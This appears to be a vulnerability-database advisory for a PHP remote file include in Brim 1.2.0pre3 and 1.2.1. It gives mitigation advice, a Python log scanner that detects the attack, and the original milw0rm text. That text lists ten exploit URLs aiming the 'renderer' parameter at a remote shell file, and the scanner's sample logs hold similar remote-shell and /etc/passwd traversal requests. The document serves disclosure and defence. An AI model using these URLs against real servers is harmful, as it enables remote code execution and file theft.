Vendor: Brim
By: mdx and The_Bat_Hacker
CVSS: 8.8 (HIGH)
Type: Remote File Include
CWE: 98 (PHP Remote File Inclusion)
Product Name: Brim
Affected Version From: 1.2.0pre3
Affected Version To: 1.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:brim_project:brim
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Brim 1.2.0pre3, 1.2.1 renderer Remote File Include Vulnerability

Brim 1.2.0pre3 and 1.2.1 are vulnerable to Remote File Include (RFI). Each bundled theme ships a template.tpl.php that passes the request-controlled 'renderer' parameter straight to PHP's include statement (<?php include $renderer; ?>) without validating it. On a server where PHP is allowed to include URLs (allow_url_fopen, and on PHP 5.2 and later allow_url_include), an attacker can point 'renderer' at an attacker-controlled file; the server then fetches, includes and executes that file with the privileges of the web server process. The attacker crafts such a URL (or sends it to a victim to visit); when the vulnerable server handles the request, the attacker-supplied file is included and executed.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly validated: the template should accept only a fixed allowlist of renderer names (or a file under the application's own templates directory) and never pass a raw request value to include. Disabling allow_url_include (and allow_url_fopen where it is not needed) in php.ini removes the remote-include primitive as defence in depth. Additionally, the application should be updated to the latest version; the vendor lists a patch as available.
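As an added defender-side example (not part of the advisory or of Brim itself), the following Python scans web-server access-log lines for the request pattern this advisory describes: a hit on one of the templates/*/template.tpl.php files whose renderer parameter carries a URL scheme or a path-traversal value. The log lines and IP addresses are constructed samples.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-format line (Apache/nginx); only client IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The include sites listed in the advisory: templates/<theme>/template.tpl.php
TEMPLATE_RE = re.compile(r"/templates/[^/]+/template\.tpl\.php$")
# A legitimate renderer is a local name; a URL scheme prefix (http:, ftp:, php:, data:) is not.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)

# Constructed sample log lines using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Oct/2006:10:01:02 +0000] "GET /brim/templates/barrel/template.tpl.php?renderer=http://198.51.100.7/shell.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Oct/2006:10:01:05 +0000] "GET /brim/templates/pda/template.tpl.php?renderer=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024',
    '198.51.100.20 - - [17/Oct/2006:10:02:00 +0000] "GET /brim/templates/nifty/template.tpl.php?renderer=default HTTP/1.1" 200 2048',
    '198.51.100.20 - - [17/Oct/2006:10:02:10 +0000] "GET /brim/index.php?renderer=http://198.51.100.7/x HTTP/1.1" 200 300',
]


def classify_renderer(value: str) -> Optional[str]:
    """Label a suspicious renderer value, or return None when it looks like a plain local name."""
    v = unquote(unquote(value)).strip()  # parse_qs decoded once already; tolerate double encoding
    if SCHEME_RE.match(v):
        return "remote-include"        # renderer=http://... is the form the advisory's exploit uses
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "local-file-include"    # the same include abused with traversal, absolute path or NUL
    return None


def scan_log(lines):
    """Return one finding per request hitting a template.tpl.php with a suspicious renderer value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we understand; a real pipeline would count these as parse errors
        parts = urlsplit(m["target"])
        if not TEMPLATE_RE.search(parts.path):
            continue  # other endpoints with a renderer parameter are out of scope for this rule
        for value in parse_qs(parts.query, keep_blank_values=True).get("renderer", []):
            label = classify_renderer(value)
            if label:
                findings.append({"ip": m["ip"], "path": parts.path, "renderer": value,
                                 "label": label, "status": m["status"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['label']:20} {f['ip']:15} {f['path']} renderer={f['renderer']!r} status={f['status']}")
```

A 200 status on a flagged request is worth a closer look, since the include either succeeded or the template failed silently; correlate with outbound connections from the web server to the host named in the renderer value.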

Exploit-DB raw data:

#                     Brim 1.2.0pre3 , 1.2.1           #
#       renderer Remote File Include Vulnerability     #
#                       Turkish Hacker's               #
#       Discovered By : mdx and The_Bat_Hacker         #
#                                                      #
#------------------------------------------------------
#               Cyber-Warrior TIM                      #
#         Ay ve Yıldızlar Geceye Yakışır...                #
#        the moon and the stars suit the night         #
########################################################
#
# Class : Remote
########################################################
#             File Code Detailed
#File1  :templates/barrel/template.tpl.php?
#File2  :templates/sidebar/template.tpl.php?
#File3  :templates/text-only/template.tpl.php?
#File4  :templates/slashdot/template.tpl.php?
#File5  :templates/penguin/template.tpl.php?
#File6  :templates/pda/template.tpl.php?
#File7  :templates/oerdec/template.tpl.php?
#File8  :templates/nifty/template.tpl.php?
#File9  :templates/mylook/template.tpl.php?
#File10 :templates/barry/template.tpl.php?
#Code :
#
#   <?php include $renderer; ?>
#
########################################################
#
#
# Exploit1 : http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
# Exploit2 : http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
# Exploit3 : http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
# Exploit4 : http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
# Exploit5 : http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
# Exploit6 : http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
# Exploit7 : http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
# Exploit8 : http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
# Exploit9 : http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
# Exploit10 : http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?
#
########################################################
#                         _ThankX_
#
#
#
#Cyber-warrior User, PROHACK, Siber-korsanlar [redx, dipsomania, kızıl_alev]
#Shika, xoron, real_dark_boy, Ulubatlı, All Friends
########################################################

http://prdownloads.sourceforge.net/brim/brimfull-1.2.1-16_Oct_2006.zip?use_mirror=heanet

# milw0rm.com [2006-10-17]